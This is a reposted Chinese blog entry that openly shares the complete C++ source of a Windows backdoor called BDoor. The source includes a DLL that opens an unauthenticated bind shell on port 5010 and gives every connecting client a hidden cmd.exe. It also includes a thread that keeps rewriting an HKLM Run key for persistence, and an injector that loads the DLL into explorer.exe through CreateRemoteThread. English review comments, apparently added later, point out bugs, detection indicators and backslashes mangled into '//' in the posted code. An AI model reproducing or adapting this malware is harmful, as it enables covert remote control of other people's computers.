后门程序--示例
发布时间:2019-05-26


后门程序BDoor及源码     选择自  的 Blog

提交时间:2005-04-22

提交用户:
工具分类:后门程序
运行平台:Windows
工具大小:316825 Bytes
文件MD5 :95e120d97967a3679dfdbd82985ea1ca
工具来源:
这是本人考研后的第一个作品(其实是很简陋的一个东西),拿出来共享,算是纪念考研成功吧!开放源代码,让大虾们见笑了。

 

// BDoor.cpp : Defines the entry point for the DLL application.

//

#include "stdafx.h"

#include "winsock2.h"

#pragma comment(lib,"ws2_32")

// TCP port the listener binds on all interfaces (see ControlThread). An
// unexpected listener on this port in whatever process loaded the DLL (the
// companion injector targets explorer.exe) is the main network indicator.
#define PORT 5010

// Run key used for persistence (written repeatedly by WriteReg).
// NOTE(review): as posted the separators appear as "//"; this looks like the
// blog's rendering mangled backslashes, so the literal as written is not a
// valid registry path. Left untouched here.
#define REG_RUN "SOFTWARE//Microsoft//Windows//CurrentVersion//Run"

// Per-connection arguments handed to RecvThread/SendThread (passed as void*).
// Each thread copies the struct on entry; the instance itself lives on BDoor's stack.
struct THREADPARAM

{
 SOCKET sock;   // connected client socket for this session
 HANDLE handle; // pipe end: write end feeding cmd.exe stdin (RecvThread), or read end of cmd.exe stdout/stderr (SendThread)
};

// Thread entry points; all are started via CreateThread and receive a void* argument.
DWORD WINAPI ControlThread(void *no); // accept loop on PORT; also starts WriteReg

DWORD WINAPI BDoor(void *lp);         // one per accepted connection: hidden cmd.exe bridged to the socket
DWORD WINAPI RecvThread(void *lp);    // socket -> cmd.exe stdin (line at a time)
DWORD WINAPI SendThread(void *lp);    // cmd.exe stdout/stderr -> socket (polled every 100 ms)
DWORD WINAPI WriteReg(void *no);      // persistence: rewrites the HKLM Run value every 5 s, forever

// DLL entry point. Simply loading this DLL (the injector does it through
// LoadLibraryA in a remote thread) starts ControlThread; there is no explicit
// initialisation or shutdown call, and nothing is stopped on DLL_PROCESS_DETACH.
// hModule and lpReserved are unused. Always returns TRUE.
BOOL APIENTRY DllMain( HANDLE hModule, 

                       DWORD  ul_reason_for_call, 
                       LPVOID lpReserved
      )
{
 switch (ul_reason_for_call)
 {
  case DLL_PROCESS_ATTACH:
  {
   // Thread handle and id are discarded; the thread is never joined.
   // NOTE(review): created while the loader lock is held, so the thread body
   // presumably cannot start until DllMain returns — confirm if it matters.
   ::CreateThread(NULL,0,ControlThread,NULL,0,NULL);
   break;
  }

     case DLL_PROCESS_DETACH:

  {
   break;
  }
 }
    return TRUE;
}

// Listener thread. Starts the persistence thread, then binds a TCP socket to
// INADDR_ANY:PORT and accepts connections forever, spawning one BDoor thread
// per client. There is no authentication: any peer that can reach the port
// gets a cmd.exe session. The parameter is unused.
// Returns (DWORD)-1 on WSAStartup/socket/bind failure; the normal path never returns.
DWORD WINAPI ControlThread(void *no)

{
 // Persistence is started before the network setup, so it keeps running
 // even when the listener fails below.
 CreateThread(NULL,0,WriteReg,NULL,0,NULL);

 WSADATA wsaData;

    SOCKET listenSock;
 if(::WSAStartup(MAKEWORD(2,2),&wsaData)!=0)
 {
  return -1;
 }

 if((listenSock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==INVALID_SOCKET)

 {
  return -1;
 }

 sockaddr_in localAddr,inAddr;

 int addrLen=sizeof(inAddr);
 
 // S_addr=0 is INADDR_ANY: listens on every interface, not just loopback.
 // localAddr is otherwise left uninitialised (sin_zero not cleared).
 localAddr.sin_addr.S_un.S_addr=0;
 localAddr.sin_family=AF_INET;
 localAddr.sin_port=htons(PORT);
 if(bind(listenSock,(sockaddr *)&localAddr,sizeof(localAddr))==SOCKET_ERROR)
 {
  closesocket(listenSock);
  return -1;
 }
 listen(listenSock,5);

 while(TRUE)

 {
  // accept() failures (INVALID_SOCKET) are not checked; a BDoor thread is
  // spawned regardless. The new thread gets a pointer to this loop-local,
  // which the next iteration overwrites; the 100 ms sleep is the only thing
  // giving BDoor time to copy it first.
  SOCKET acceptSock=accept(listenSock,(sockaddr *)&inAddr,&addrLen);
  DWORD ID;
  CreateThread(NULL,0,BDoor,&acceptSock,0,&ID);
  Sleep(100);
 }

 // Unreachable: the loop above has no exit condition.
 closesocket(listenSock);

 ::WSACleanup();
}

// Persistence thread. Builds "<system dir>/DllInjection.exe" and, forever,
// rewrites HKLM\REG_RUN value "sysDll" (REG_SZ) to that path every 5 s, so
// deleting the value while the host process lives is undone within seconds.
// Indicators: Run value named "sysDll"; DllInjection.exe in the system
// directory; repeated RegSetValueEx on the Run key from the host process.
// The parameter is unused; the function never returns on the normal path.
DWORD WINAPI WriteReg(void *no)

{
 char sysPath[MAX_PATH]={0};
 int ret=::GetSystemDirectory(sysPath,MAX_PATH);
 // NOTE(review): '//' is a multi-character constant (an int), so the
 // comparison with a char can never be true as posted — this looks like a
 // backslash escape mangled by the blog, and the strcat of "//" likewise.
 if(sysPath[ret-1]!='//')
  strcat(sysPath,"//");
 strcat(sysPath,"DllInjection.exe");
 int len=strlen(sysPath);
 while(TRUE)
 {
  HKEY hKey;
  // On open failure this spins with no delay until the open succeeds.
  if(::RegOpenKey(HKEY_LOCAL_MACHINE,REG_RUN,&hKey)!=ERROR_SUCCESS)
   continue;
  // len excludes the terminating NUL; the return value is ignored.
  ::RegSetValueEx(hKey,"sysDll",0,REG_SZ,(BYTE *)sysPath,len);

  ::RegCloseKey(hKey);

  Sleep(5000);
 }
 return 0;
}

// Per-connection session thread. Starts a hidden cmd.exe whose stdin comes
// from one anonymous pipe and whose stdout/stderr go to another, then runs a
// RecvThread (socket -> stdin) and a SendThread (stdout -> socket). The
// session ends when RecvThread exits (client disconnect or "exit" line);
// the helper thread and the child process are then killed.
// Detection: the host process spawning cmd.exe with SW_HIDE and inherited
// std handles while holding an inbound TCP connection.
// lp points at a SOCKET (copied immediately; see ControlThread on its lifetime).
// Returns (DWORD)-1 if CreateProcess fails (pipe handles and the socket are
// then leaked), else 0.
DWORD WINAPI BDoor(void *lp)

{
 SOCKET sock=*((SOCKET *)lp);
 HANDLE hCmdOut,hCmdIn,hRead,hWrite;

 SECURITY_ATTRIBUTES sec={0};

 sec.nLength=sizeof(sec);
 sec.lpSecurityDescriptor=NULL;
 // Both pipes are inheritable so cmd.exe can receive them as std handles;
 // CreatePipe return values are not checked.
 sec.bInheritHandle=TRUE;
 CreatePipe(&hCmdIn,&hWrite,&sec,0);   // hCmdIn: child stdin read end; hWrite: this side writes commands
 CreatePipe(&hRead,&hCmdOut,&sec,0);   // hRead: this side reads output; hCmdOut: child stdout/stderr write end

 char cmdDir[MAX_PATH]={0};

 ::GetSystemDirectory(cmdDir,MAX_PATH);
 // NOTE(review): '//' is a multi-character constant here too (see WriteReg);
 // the path separators look mangled by the blog's rendering.
 if(cmdDir[strlen(cmdDir)-1]!='//')
  strcat(cmdDir,"//");
 strcat(cmdDir,"cmd.exe");

 STARTUPINFO startUpInfo={0};

 startUpInfo.cb=sizeof(startUpInfo);
 startUpInfo.dwFlags=STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
 startUpInfo.wShowWindow=SW_HIDE;
 startUpInfo.hStdError=startUpInfo.hStdOutput=hCmdOut;
 startUpInfo.hStdInput=hCmdIn;

 PROCESS_INFORMATION processInfo={0};

 // bInheritHandles=TRUE: every inheritable handle in this process, not only
 // the two pipe ends, is passed to the child.
 int ret=CreateProcess(cmdDir,NULL,NULL,NULL,TRUE,0,NULL,NULL,&startUpInfo,&processInfo);
 if(ret==0)
 {
  return -1;
 }
 // Drop the child-side ends so EOF/closure behaves; the parent keeps hWrite/hRead.
 CloseHandle(hCmdIn);
 CloseHandle(hCmdOut);

 DWORD ID1,ID2;

 HANDLE hRecvThread,hSendThread;
 // Both param structs live on this stack frame; the helper threads copy
 // them on entry, which is what keeps them valid until this function returns.
 THREADPARAM recvParam={0},sendParam={0};

 recvParam.sock=sock;

 recvParam.handle=hWrite;
 hRecvThread=CreateThread(NULL,0,RecvThread,&recvParam,0,&ID1);

 sendParam.sock=sock;

 sendParam.handle=hRead;
 hSendThread=CreateThread(NULL,0,SendThread,&sendParam,0,&ID2);

 ULONG code;

 // Block until the client side finishes; SendThread never exits on its own,
 // so it is terminated forcibly (the "exit code" read here is presumably
 // STILL_ACTIVE since the thread is still running — confirm), and cmd.exe is killed.
 ::WaitForSingleObject(hRecvThread,INFINITE);
 ::GetExitCodeThread(hSendThread,&code);
 ::TerminateThread(hSendThread,code);
 ::GetExitCodeProcess(processInfo.hProcess,&code);
 ::TerminateProcess(processInfo.hProcess,code);
 closesocket(sock);
 CloseHandle(hWrite);
 CloseHandle(hRead);
 // processInfo.hProcess/hThread and the two thread handles are never closed.
 return 0;
}

// Socket -> cmd.exe stdin. Reads the client one byte at a time, echoes each
// byte back, and accumulates a line in cmd; on a line terminator the line is
// either treated as the "exit" command (ends the session) or written to the
// child's stdin. lp points at a THREADPARAM, copied on entry.
// Returns 0 when the client closes the connection or sends "exit".
DWORD WINAPI RecvThread(void *lp)

{
 char cmd[256]={0};
 THREADPARAM param=*((THREADPARAM *)lp);
 while(1)
 {
  char temp[2]={0};
  int ret=recv(param.sock,temp,1,0);
  // ret==0: orderly shutdown. ret==SOCKET_ERROR matches neither branch, so a
  // socket error makes this loop call recv() again without ever exiting.
  if(ret==0)
  {
   break;
  }
  else if(ret==1)
  {
   send(param.sock,temp,1,0);
   // No bounds check: cmd holds 255 bytes plus NUL, and strcat keeps appending
   // until a terminator arrives, so a longer line overflows the buffer.
   strcat(cmd,temp);
   // NOTE(review): '/n' is a multi-character constant and "exit/r/n" contains
   // no real CR/LF; both look like mangled backslash escapes in the posted copy.
   if(temp[0]=='/n')
   {
    if(_stricmp(cmd,"exit/r/n")==0)
    {
     break;
    }
    ULONG len;
    // WriteFile result is ignored; a closed pipe is not detected here.
    ::WriteFile(param.handle,cmd,strlen(cmd),&len,NULL);
    memset(cmd,0,256);
   }
  }
 }
 return 0;
}

// cmd.exe stdout/stderr -> socket. Polls the pipe every 100 ms; when data is
// pending, reads up to 1024 bytes and sends them to the client. The loop has
// no exit condition — BDoor ends it with TerminateThread once the client side
// is done. lp points at a THREADPARAM, copied on entry. Never returns normally.
DWORD WINAPI SendThread(void *lp)

{
 THREADPARAM param=*((THREADPARAM *)lp);
 char buf[1024]={0};
 while(1)
 {
  ULONG len=0;
  // Peek copies pending bytes into buf without consuming them; len is the
  // amount copied. Errors (e.g. broken pipe after cmd.exe exits) are ignored.
  ::PeekNamedPipe(param.handle,buf,1024,&len,NULL,NULL);
  if(len>0)
  {
   // ReadFile and send return values are unchecked; a short send drops data.
   ::ReadFile(param.handle,buf,1024,&len,NULL);
   send(param.sock,buf,len,0);
   memset(buf,0,1024);
  }
  Sleep(100);
 }
 return 0;
}

 

----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------

 

// DllInjection.cpp : Defines the entry point for the application.

//

#include "stdafx.h"

#include "windows.h"
#include "stdlib.h"
#include "tlhelp32.h"
#include "io.h"

// Finds a running process by executable base name (no extension, case-insensitive);
// returns its PID, or -1 if not found or the snapshot fails.
long GetProcessID(char *processName);

// Injector entry point. After a 5 s delay it locates explorer.exe, writes the
// path "<system dir>/BDoor.dll" into that process, and starts a remote thread
// at kernel32!LoadLibraryA with that path as its argument, so the DLL's
// DllMain runs inside explorer.exe (classic LoadLibrary injection).
// Detection: OpenProcess(PROCESS_ALL_ACCESS) on explorer.exe followed by
// VirtualAllocEx/WriteProcessMemory/CreateRemoteThread whose start address
// is LoadLibraryA; BDoor.dll present in the system directory.
// All WinMain parameters are unused. Returns -1 on any failure (handles
// opened before that point are not closed), else 0.
int APIENTRY WinMain(HINSTANCE hInstance,

                     HINSTANCE hPrevInstance,
                     LPSTR     lpCmdLine,
                     int       nCmdShow)
{
  // TODO: Place code here.
 // Delay, presumably to let the desktop settle when launched from the Run key.
 Sleep(5000);
 long ID=GetProcessID("explorer");
 if(ID==-1)
  return -1;

 HINSTANCE hDll;

 HINSTANCE (* pProc)(LPCTSTR);
 DWORD (WINAPI * pThreadProc)(void *);
 // LoadLibraryA's address in this process is reused as the remote thread
 // start address; that relies on kernel32 being mapped at the same base in
 // the target.
 if((hDll=::LoadLibrary("kernel32.dll"))==NULL)
  return -1;
 if((pProc=(HINSTANCE (*)(LPCTSTR))::GetProcAddress(hDll,"LoadLibraryA"))==NULL)
  return -1;
 pThreadProc=(DWORD (WINAPI *)(void *))pProc;

 HANDLE hProcess=::OpenProcess(PROCESS_ALL_ACCESS,TRUE,ID);

 if(hProcess==NULL)
  return -1;

 char pDllPath[MAX_PATH]={0};

 char *pRemoteAddr=NULL;
 int ret=::GetSystemDirectory(pDllPath,MAX_PATH);
 // NOTE(review): '//' is a multi-character constant; as posted this compare
 // never holds and the separator looks like a mangled backslash (see BDoor.cpp).
 if(pDllPath[ret-1]!='//')
  strcat(pDllPath,"//");
 strcat(pDllPath,"BDoor.dll");
 if(::_access(pDllPath,0)==-1)
  return -1;
 
 // strlen+1 bytes are committed but only strlen bytes are written; the
 // terminator relies on the fresh allocation being zero-filled.
 pRemoteAddr=(char*)::VirtualAllocEx(hProcess,NULL,strlen(pDllPath)+1,MEM_COMMIT,PAGE_READWRITE);
 if(pRemoteAddr==NULL)
  return -1;
 ret=::WriteProcessMemory(hProcess,pRemoteAddr,pDllPath,strlen(pDllPath),NULL);
 if(ret==0)
  return -1;
 
 // The remote thread's handle is never checked, waited on, or closed.
 HANDLE hRemoteThread=::CreateRemoteThread(hProcess,NULL,0,pThreadProc,pRemoteAddr,0,NULL);

 // Fixed delay rather than waiting for the remote thread; the path buffer
 // is decommitted right after, whether or not LoadLibraryA has finished.
 Sleep(100);

 ::VirtualFreeEx(hProcess,pRemoteAddr,strlen(pDllPath)+1,MEM_DECOMMIT);
 ::CloseHandle(hProcess);
 return 0;
}

// Walks a Toolhelp process snapshot and returns the PID of the first process
// whose executable base name (extension stripped) matches processName
// case-insensitively, or -1 if none matches or the snapshot cannot be taken.
// The snapshot handle is never closed on any path.
long GetProcessID(char *processName)

{
 HANDLE hSnapshot; 
 PROCESSENTRY32 pe32={0}; 
 BOOL fRet;

 hSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0); 

 // NOTE(review): the documented failure value is INVALID_HANDLE_VALUE, not
 // NULL — confirm; as written a failed snapshot may not be caught here.
 if(hSnapshot==NULL) 
  return -1;

 pe32.dwSize=sizeof(PROCESSENTRY32); 

 fRet=Process32First(hSnapshot,&pe32); 
 if(!fRet) 
  return -1;

 int g=0; // set to 1 when a match is found

 char drive[_MAX_DRIVE]={0};
 char dir[_MAX_DIR]={0};
 char fname[_MAX_FNAME]={0};
 char ext[_MAX_EXT]={0};
 do 
 { 
  // Compare only the file name component, so "explorer" matches "explorer.exe"
  // regardless of directory.
  _splitpath(pe32.szExeFile,drive,dir,fname,ext);
  if(_stricmp(processName,fname)==0)
  {
   g=1;
   break;
  }
 }while(Process32Next(hSnapshot,&pe32));
 if(g!=1)
  return -1;

 return pe32.th32ProcessID;

}

 

转载地址:http://snsqi.baihongyu.com/
